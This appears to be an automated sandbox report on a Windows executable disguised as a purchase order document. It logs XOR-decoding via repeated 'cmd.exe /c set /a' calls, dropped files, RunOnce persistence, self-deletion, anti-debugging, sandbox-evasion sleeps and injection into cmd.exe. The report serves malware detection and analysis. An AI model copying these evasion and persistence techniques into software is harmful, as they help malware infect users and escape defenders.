              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00405EA2
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_10002CE0 push eax; ret 5_2_10002D0E
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DDCC48 pushad ; retf 135_3_05DDCC49
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DDCC48 pushad ; retf 135_3_05DDCC49
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DE0DC0 pushad ; retf 135_3_05DE0DC1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DE0DC0 pushad ; retf 135_3_05DE0DC1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DDCC48 pushad ; retf 135_3_05DDCC49
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DDCC48 pushad ; retf 135_3_05DDCC49
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DE0DC0 pushad ; retf 135_3_05DE0DC1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 135_3_05DE0DC0 pushad ; retf 135_3_05DE0DC1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044693D push ecx; ret 137_2_0044694D
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DB84
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044DB70 push eax; ret 137_2_0044DBAC
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00451D54 push eax; ret 137_2_00451D61
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0A4
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0044B090 push eax; ret 138_2_0044B0CC
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00451D34 push eax; ret 138_2_00451D41
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00444E71 push ecx; ret 138_2_00444E81
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00414060 push eax; ret 139_2_00414074
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00414060 push eax; ret 139_2_0041409C
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00414039 push ecx; ret 139_2_00414049
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004164EB push 0000006Ah; retf 139_2_004165C4
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00416553 push 0000006Ah; retf 139_2_004165C4
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00416555 push 0000006Ah; retf 139_2_004165C4
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exeJump to dropped file
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\nsExec.dllJump to dropped file
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce NomapJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce NomapJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce NomapJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce NomapJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeFile deleted: c:\users\user\desktop\purchaseordersheet&specificationsdoc.exe
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,138_2_004047CB
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeWindow / User API: threadDelayed 3597Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeWindow / User API: threadDelayed 5383Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeWindow / User API: foregroundWindowGot 1757Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\nsExec.dllJump to dropped file
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe TID: 6104Thread sleep time: -38000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe TID: 808Thread sleep time: -16149000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeThread sleep count: Count: 3597 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405454
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405E7B FindFirstFileA,FindClose,5_2_00405E7B
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040AE51 FindFirstFileW,FindNextFileW,137_2_0040AE51
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,138_2_00407EF8
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,139_2_00407898
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00418981 memset,GetSystemInfo,137_2_00418981
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Pneumonolith.uplJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmpJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeAPI call chain: ExitProcess graph end nodegraph_5-2450
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeAPI call chain: ExitProcess graph end nodegraph_5-2608
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeAPI call chain: ExitProcess graph end nodegraph_138-34114
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess information queried: ProcessInformation

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00402C33 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,5_2_00402C33
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00405EA2
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: NULL target: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: NULL target: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
